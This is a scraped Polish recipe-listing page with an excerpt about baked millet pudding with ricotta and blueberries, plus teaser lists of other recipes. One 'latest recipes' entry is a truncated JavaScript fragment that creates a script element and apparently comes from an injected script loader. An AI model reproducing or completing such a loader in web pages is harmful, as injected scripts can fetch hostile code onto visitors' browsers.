pieczony pudding z jaglanki z ricottą i borówkami, bez cukru
Źródło: https://majaskorupska.blogspot.com/2019/08/pieczony-pudding-z-jaglanki-z-ricotta-i.html
Do jedzenia kaszy jaglanej chyba nikogo już nie trzeba przekonywać. Po dodaniu do niej mleka kokosowego, przypraw i miodu, smakuje tak, że oprzeć się jej nie można, sama miałam problem z przejściem do kolejnego etapu przygotowywania puddingu.Taka pieczona jaglanka to doskonałe danie na śniadanie, ale też w ciągu dnia, jako urozmaicenie menu i wzbogacenie go w białko i witaminy.Owoce...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 19
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 9
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 22
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 18
Przepisy z bloga
Tymi ciasteczkami przerwałam pisanie bloga, nimi otwieram... ⇖ 38
Jeżeli jesteście bananożercami jak ja, te post jest dla... ⇖ 569
Galette to moje ulubione ciasto. Jest to tarta francuska,... ⇖ 527
Cukinia obrodziła, potrzebne są pomysły i przepisy na... ⇖ 619
Włosi są mistrzami w antipasti, prościutkich mini... ⇖ 509
Zaczęłam przygotowania do nowych warsztatów, tym razem z... ⇖ 497
Zawsze lubiłam tarty kruche z owocami czy konfiturami, ale... ⇖ 550
To chyba najbardziej, no może po moussace greckie danie.... ⇖ 593
Dzisiaj trudno mi to sobie wyobrazić, że był czas, dawno... ⇖ 559
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1817
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1193
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 702
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 697
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 491
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 467









































